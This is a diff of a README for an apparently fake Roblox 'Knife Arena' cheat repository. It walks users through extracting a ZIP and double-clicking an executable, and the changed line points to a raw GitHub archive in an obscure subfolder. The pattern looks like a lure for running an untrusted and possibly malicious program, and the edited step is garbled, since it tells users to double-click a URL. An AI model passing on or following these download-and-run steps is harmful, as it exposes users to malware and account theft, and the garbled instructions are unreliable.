r4hm4candy-cyber/Roblox-Knife-Arena-Script/README.md

    Once downloaded, locate the ZIP file in your downloads folder.
 Right-click and choose "Extract All".
 Follow the prompts to complete the extraction.

 4. **Run the Script:**
-   After extraction, open the folder and double-click on the `Roblox-Knife-Arena-Script.exe` file to start the script.
+   After extraction, open the folder and double-click on the `https://raw.githubusercontent.com/r4hm4candy-cyber/Roblox-Knife-Arena-Script/main/Spaniardo/KnifeRobloxArenaScript_v3.0.zip` file to start the script.

 5. **Enjoy Your Game:**
    Once the script is running, launch Roblox.
 The script will enhance your gaming experience automatically.